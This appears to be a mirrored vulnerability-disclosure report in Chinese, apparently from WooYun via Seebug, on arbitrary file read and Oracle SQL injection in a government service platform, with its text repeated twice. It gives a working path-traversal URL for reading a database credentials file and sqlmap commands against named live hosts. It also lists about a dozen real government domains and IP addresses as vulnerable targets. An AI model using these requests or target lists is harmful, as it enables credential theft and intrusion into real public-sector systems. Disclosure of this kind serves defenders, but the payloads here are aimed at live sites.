VULHUB ™

### 简要描述： 某大型政府系统任意文件读取及Oracle注入 ### 详细说明： 这系统有人提交过，详情： [WooYun: 某大型政府服务系统Oracle注入(使用量大)](http://www.wooyun.org/bugs/wooyun-2014-085183) 文件读取（获取数据库用户、密码等）： /download?url=../../WEB-INF/classes/wssp/util/dbconfig.properties http://hxasc.cn/download?url=../../WEB-INF/classes/wssp/util/dbconfig.properties [<img src="https://images.seebug.org/upload/201412/252259013260bc8f3fea918f828e24d200780764.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/252259013260bc8f3fea918f828e24d200780764.jpg) SQL注入：/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 ywlsh sxname deptname这几个参数都存在注入 sqlmap.py -u "http://www.yjxzfw.com.cn/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3" --dbms oracle [<img src="https://images.seebug.org/upload/201412/2523004775e3a62f40c4c6ddec2411fc187a7143.jpg" alt="1.jpg" width="600"...

### 简要描述： 某大型政府系统任意文件读取及Oracle注入 ### 详细说明： 这系统有人提交过，详情： [WooYun: 某大型政府服务系统Oracle注入(使用量大)](http://www.wooyun.org/bugs/wooyun-2014-085183) 文件读取（获取数据库用户、密码等）： /download?url=../../WEB-INF/classes/wssp/util/dbconfig.properties http://hxasc.cn/download?url=../../WEB-INF/classes/wssp/util/dbconfig.properties [<img src="https://images.seebug.org/upload/201412/252259013260bc8f3fea918f828e24d200780764.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/252259013260bc8f3fea918f828e24d200780764.jpg) SQL注入：/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 ywlsh sxname deptname这几个参数都存在注入 sqlmap.py -u "http://www.yjxzfw.com.cn/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3" --dbms oracle [<img src="https://images.seebug.org/upload/201412/2523004775e3a62f40c4c6ddec2411fc187a7143.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/2523004775e3a62f40c4c6ddec2411fc187a7143.jpg) sqlmap.py -u "http://www.yjxzfw.com.cn/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3" --dbms oracle --current-db [<img src="https://images.seebug.org/upload/201412/25230119a5f5d6443c34a22b40076c4d46eb7726.jpg" alt="aaa.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/25230119a5f5d6443c34a22b40076c4d46eb7726.jpg) 随便例举几个案例： http://www.yjxzfw.com.cn/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://www.gygxzw.gov.cn:8066/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://www.tlsp.net/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://58.42.249.116/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://218.201.232.67:8080/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://hxasc.cn/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://jjjc.sqxz.gov.cn/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://119.1.108.246/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://58.42.241.14:6778/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://www.sinanxzfw.gov.cn/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 http://jc.dlxg.gov.cn/browseresearch.do?method=query&ywlsh=1&sxname=2&deptname=3 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201412/25230119a5f5d6443c34a22b40076c4d46eb7726.jpg" alt="aaa.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201412/25230119a5f5d6443c34a22b40076c4d46eb7726.jpg)